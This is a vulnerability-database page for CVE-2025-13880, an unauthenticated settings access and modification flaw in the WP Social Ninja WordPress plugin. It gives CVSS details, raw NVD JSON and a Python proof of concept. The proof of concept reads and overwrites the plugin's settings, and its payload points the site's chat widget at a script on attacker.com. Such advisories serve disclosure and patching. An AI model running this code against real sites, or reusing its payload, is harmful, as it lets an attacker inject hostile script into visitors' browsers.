Security Vulnerability Report
δΈ­ζ–‡
CVE-2025-13880 CVSS 6.5 MEDIUM

CVE-2025-13880

Published: 2025-12-17 05:16:11
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The WP Social Ninja – Embed Social Feeds, Customer Reviews, Chat Widgets (Google Reviews, YouTube Feed, Photo Feeds, and More) plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the getAdvanceSettings and saveAdvanceSettings functions in all versions up to, and including, 4.0.1. This makes it possible for unauthenticated attackers to view and modify plugin's advanced settings.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP Social Ninja <= 4.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13880 PoC - Unauthenticated Access to WP Social Ninja Settings # Affected: WP Social Ninja <= 4.0.1 import requests import json import sys target_url = input("Enter target URL (e.g., https://example.com): ").rstrip('/') def cve_2025_13880_poc(): """ This PoC demonstrates the missing capability check vulnerability in WP Social Ninja plugin. Attackers can access and modify plugin settings without authentication. """ print("[*] CVE-2025-13880 WP Social Ninja - Unauthenticated Settings Access PoC") print("=" * 80) # Step 1: Attempt to retrieve advanced settings without authentication print("\n[Step 1] Attempting to retrieve advanced settings...") get_settings_endpoint = f"{target_url}/wp-json/wp-social-ninja/v1/advance-settings" headers = { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } try: response = requests.get(get_settings_endpoint, headers=headers, timeout=10, verify=False) print(f"[*] GET Request Status: {response.status_code}") if response.status_code == 200: print("[!] VULNERABLE: Settings can be accessed without authentication!") print(f"[+] Response: {json.dumps(response.json(), indent=2)}") elif response.status_code == 401 or response.status_code == 403: print("[-] NOT VULNERABLE: Authentication required (expected behavior)") else: print(f"[*] Unexpected status code: {response.status_code}") print(f"[*] Response: {response.text[:200]}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") # Step 2: Attempt to modify settings without authentication print("\n[Step 2] Attempting to modify settings...") modify_endpoint = f"{target_url}/wp-json/wp-social-ninja/v1/advance-settings" # Malicious payload - attacker could modify any setting payload = { "social_config": { "api_key": "attacker-controlled-key", "feeds_source": "malicious-source.com" }, "chat_config": { "enabled": True, "script_url": "https://attacker.com/malicious-chat.js" } } try: response = requests.post(modify_endpoint, headers=headers, json=payload, timeout=10, verify=False) print(f"[*] POST Request Status: {response.status_code}") if response.status_code == 200: print("[!] VULNERABLE: Settings can be modified without authentication!") print(f"[+] Response: {response.text}") elif response.status_code == 401 or response.status_code == 403: print("[-] NOT VULNERABLE: Authentication required (expected behavior)") else: print(f"[*] Unexpected status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("\n[*] PoC execution completed") print("[!] Note: This is for educational and authorized testing purposes only") if __name__ == "__main__": cve_2025_13880_poc()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13880", "sourceIdentifier": "[email protected]", "published": "2025-12-17T05:16:11.180", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Social Ninja – Embed Social Feeds, Customer Reviews, Chat Widgets (Google Reviews, YouTube Feed, Photo Feeds, and More) plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the getAdvanceSettings and saveAdvanceSettings functions in all versions up to, and including, 4.0.1. This makes it possible for unauthenticated attackers to view and modify plugin's advanced settings."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/4.0.1/app/Http/Controllers/SettingsController.php#L144", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/4.0.1/app/Http/Policies/SettingsPolicy.php#L14", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/4.0.1/app/Http/Routes/api.php#L44", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/4.0.1/app/Services/PermissionManager.php#L176", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8b8e3cb9-00b3-4500-adf0-c8a9fbf9d546?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.